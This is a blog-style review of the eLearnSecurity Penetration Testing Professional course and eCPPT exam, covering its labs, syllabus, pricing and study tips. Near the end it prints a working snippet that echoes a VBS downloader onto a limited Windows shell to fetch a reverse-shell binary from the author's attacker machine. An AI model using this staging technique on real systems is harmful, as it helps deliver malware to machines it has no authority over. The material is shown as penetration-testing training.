I wanted to share my experiences with an online training I recently signed up for called the eLearnSecurity’s Penetration Testing Professional v4 course elite edition. The course is designed to teach professional penetration testing concepts and skills through a se
ries of slides, videos, and interactive labs. Overall, I thought the course was extremely well done and found the greatest benefit was working through the labs to reinforce the concepts being taught. Some of the slides has a few spelling mistakes, but I’m fine with that as English is not the primary language of the entire world.
The elite version of the course allows you to experience the course in several different delivery methods (HTML5, Flash, or PDF). I exported all the slides into PDF that I could which made it easy for my system to index the PDF’s. This is exceptionally handy when I want to use these as reference guides and search for keywords, methods, or tools. I found the Flash method the easiest to work with though as the integration of the recorded videos into specific lessons was seamless. There was even a method to download additional files associated with lessons to work with. My favorite section to work through was the Network Security portion, that’s where all the fun stuff is. My least favorite was the System Security, learning how to explore win32 binaries in Immunity Debugger and IDA Free was difficult for me. I had never attempted anything like that before, I must have read thru those slides a hundred times and watched the two videos for that section at least 30 times each. Additionally, the labs associated with that section were extremely light (exactly one lab) when other sections had multiple labs. I found that I needed to supplement my learning with other resources, blogs, and materials for exploit development and shellcoding.
A majority of the material I personally found as review, still great material though. Some of it I questioned on why was in a professional version of the course but still appreciated it as reference material and was a great refresher. In this field it’s impossible to know everything let alone remember everything.
The best part of the entire course was the extensive labs to back up the materials being taught. There are a total of 21 different interactive lab environments that you start when your ready. In reality, there are 25 labs as one of them expands into several different types of web app attacks. Each lab will take a few minutes to spin up, after which you will have an openvpn certificate and configuration file to download to connect to that lab via OpenVPN. Each lab is uniquely created just for your interaction, you wont have to fight with other users when hitting these boxes/services. That is really nice! I’m a huge fan of HackTheBox.eu (HTB) but unless your wiling to pay for their premium service you are usually sharing that attack box with 20-50 other users at once. The labs also have a well written lab manual which go over the scope and objective’s of the lab. Some of them give you a bit more details and others (blind penetration test lab) give you very few other than the scope. A choose your own adventure style to the labs in my opinion, this allows those more experienced to work through on their own. If you are a little more on the inexperienced side, that’s okay, as the lab manual towards the end has a solutions section. This is a complete walkthrough on how the instructors solved the problems at hand, sometimes multiple methods to achieve the same result are shared as well. This was really insightful as I worked through the labs. For instance, on a lab where I gained a PHP meterpreter shell on a box my shell kept dying after about 15 seconds. Extremely frustrating and I wanted to know why, lots of googling gave me different results but still no direct answer. Well the lab solution had some explanations and offered up several solutions to that problem.
After spending 31 hours in the lab environment I felt I was ready for their exam, the eLearnSecurity Certified Professional Penetration Tester (eCPPT). I had a total of 120 hours with my elite course, so I still have 89 some hours left. I’ll likely go back and work through the labs all over again in another month or two. This will help keep me fresh on some of the skills I’ve learned in a fun and safe place.
Course Outline & Pre-req’s:
There are three primary sections of the PTP course which teach the material that their Certified Professional Penetration Tester (eCPPT) exam is tested upon. There are two bonus sections which have excellent material but are not tested in the exam. Their posted syllabus is quite extensive and breaks out each of these sections in elaborate detail, so if you really want to know if concepts are covered definitely check it out.
- Web Application Security
- Information Gathering
- Cross Site Scriting
- SQL Injections
- Other Common Web Attacks
- System Security
- Architecture Fundamentals
- Assembler Debuggers and Tool Arsenal
- Buffer Overflow
- Cryptography and Password Cracking
- Network Security
- Information Gathering
- Sniffing and Man-in-the-middle (MITM) Attacks
- Social Engineering
- Ruby and Metasploit
- WiFi Security
According to their website, eLearnSecurity recommends the following as pre-requisites before taking on this course and certification:
- Basic understanding of networking: TCP/IP, Routing, Forwarding.
- Reading and understanding C, ASM, Python, PHP code will help although not mandatory.
- No development skills required.
- Basic understanding of HTTP protocol, Cookies, Sessions
- Understanding of IT Security matters and basics of Penetration Testing
- A wireless NIC with injection capabilities (Alfa AWUS036h recommended)
- A spare WiFi Access point
I don’t necessarily agree with these pre-req’s though. The most important things here to take on this course are:
- Determination, perseverance, and time commitment
- Knowing how to computer
- Ability to create and use virtual machines
- Basic understanding of networking: TCP/IP, Routing, Forwarding
- Familiarity with Windows and Linux operating systems
- Being comfortable in GUI and CMD line environments on both systems
Nearly all of the labs were centered around the Network Security section of the course, after-all that was the focus.
|Lab 1||System Security section exercises||System Security|
|Lab 2||Information Gathering||Network Pentesting|
|Lab 3||Port/Service Scanning||Network Pentesting|
|Lab 4||Vulnerability Scanning & Exploitation||Network Pentesting|
|Lab 5||Post Exploitation||Network Pentesting|
|Lab 6||Blind Penetration Test||Challenge|
|Lab 7||Nessus||Network Pentesting|
|Lab 8||Cain n Abel||Network Pentesting|
|Lab 9||NetBIOS Hacking||Network Pentesting|
|Lab 10||Poisoning and Sniffing||Network Pentesting|
|Lab 11||Cient-side Exploitation||Network Pentesting|
|Lab 12||DNS and SMB Relay attacks||Network Pentesting|
|Lab 13||SNMP Analysis||Network Pentesting|
|Lab 14||Privilege Escalation||Network Pentesting|
|Lab 15||Privilege Escalation via Services||Network Pentesting|
|Lab 16||Bypassing Antiviruses||Network Pentesting|
|Lab 17||Ruby for Pentester labs||Network Pentesting|
|Lab 18||Exploitation with Ruby||Network Pentesting|
|Lab 19||From XSS to Domain Admin||Network Pentesting|
|Lab 20||WebApp Labs – 8 Challenging Labs||Educational/Challenge|
|Lab 21||ICMP Redirect Attack||Network Pentesting|
Their are several different tiers of pricing depending on the level you purchase. I recommend the elite version, as this gives you double the lab training hours and ability to download the material in PDF format. Again, this is incredibly helpful for reference to digitally search through these documents.
Their prices range from $999 to $1,299 and can be found below, they do offer pay as you go model.
The eLearnSecurity Certified Professional Penetration Tester (eCPPT) certification was one of the most rewarding exam’s i’ve taken to date because the environment was entirely hands on and truly tests the individual on their knowledge and comprehension of the material. You can’t just memorize exam questions, practice tests and material and have a good shot of passing due to multiple choice questions.
When you start the exam you will receive a scope of engagement that you as a penetration tester have been charged with. There is a network map, exam objectives, and scope of IP’s. The exam objectives are interesting because there are specific scenarios you have to hit in order to pass, so pay close attention to the details. There are also some instructions on how to edit your /etc/hosts file to map IP’s to internal domains. have 7 days from start, limited to PST so its sometimes a bit less than 168 hours. Still this is plenty of time to work through several boxes in the exam environment. After the 7 days the VPN access is terminated and you can no longer connect in. You then have another 7 days to upload an exam report in PDF format. After you upload your exam report eLearnSecurity can take up to 30 business days for them to grade it. I submitted my report on November 18th and received a grade on December 28th, business day 28 of 30.
There was one thing the course didn’t cover but I ran into, a ton of research and some ingenuity I came up with some syntax I had to manually copy line by line to the Windows box I had a limited CMD shell on. I needed to upgrade my shell to something more useful like a meterpreter but the box didn’t give me a lot of options. If this was a Linux box I could just wget a file (meterpreter binary) from my attacker machine to the target. Since this was Windows, it’s not inherently built in, this is where cscript.exe comes in. Using cscript.exe found in the Windows\System32 folder I was able to download a meterpreter built binary from my attacker machine to the victim by calling cscript and passing the visual basic script I called “d.vbs”. The VBS script was manually created by copying line by line into the limited cmd shell to slowly build out the file by appending each line entered. There is probably a better way, but this worked for me. Know of a better way? Hit me up!
Using Cscript.exe to replicate wget functionality
# Copy and paste the below contents via a CMD shell to a target to get the contents of the script on target # Then execute like this: C:\windows\system32\cscript.exe d.vbs # This script can then be executed to replicate functionality of wget on Linux. It will download any file from a remote system. # The IP on line 1 is the location of my attacker box hosting a binary via python -m SimpleHTTPServer 80 echo strFileURL = "http://172.16.40.5/rev_443.exe" > d.vbs echo strHDLocation = "c:\rev_443.exe" >> d.vbs echo. >> d.vbs echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> d.vbs echo. >> d.vbs echo objXMLHTTP.open "GET", strFileURL, false >> d.vbs echo objXMLHTTP.send() >> d.vbs echo. >> d.vbs echo If objXMLHTTP.Status = 200 Then >> d.vbs echo Set objADOStream = CreateObject("ADODB.Stream") >> d.vbs echo objADOStream.Open >> d.vbs echo objADOStream.Type = 1 'adTypeBinary >> d.vbs echo. >> d.vbs echo objADOStream.Write objXMLHTTP.ResponseBody >> d.vbs echo objADOStream.Position = 0 'Set the stream position to the start >> d.vbs echo. >> d.vbs echo Set objFSO = Createobject("Scripting.FileSystemObject") >> d.vbs echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> d.vbs echo Set objFSO = Nothing >> d.vbs echo. >> d.vbs echo objADOStream.SaveToFile strHDLocation >> d.vbs echo objADOStream.Close >> d.vbs echo Set objADOStream = Nothing >> d.vbs echo End if >> d.vbs echo. >> d.vbs echo Set objXMLHTTP = Nothing >> d.vbs
Tips for passing
- Work through all the labs, to the point you can knock them out very fast and explain to yourself exactly what you did.
- As you work through the labs, practice taking screenshots and copying useful tool input and output.
- Documentation is incredibly important, if you wait until the end to start you will likely be very frustrated and possibly run out of time.
- Export all of the course material into PDF format, this will allow you to search through the PDFs quickly incase you get stuck. Searching for keywords, phrases, tools, techniques and getting a fast refresher is extremely helpful.
- I built a Kali VM specifically for the exam, on my host machine I kept all my notes via Sublime Text (alternative’s are Notepad++ or Atom).
- Build your own cheat sheet to keep useful commands, syntax, and techniques. I used Google Docs and built a spreadsheet
After eLS has graded your pentest report you will get an email letting you know if you passed or not. Thankfully I was able to successfully pass and earn the eCPPT certification.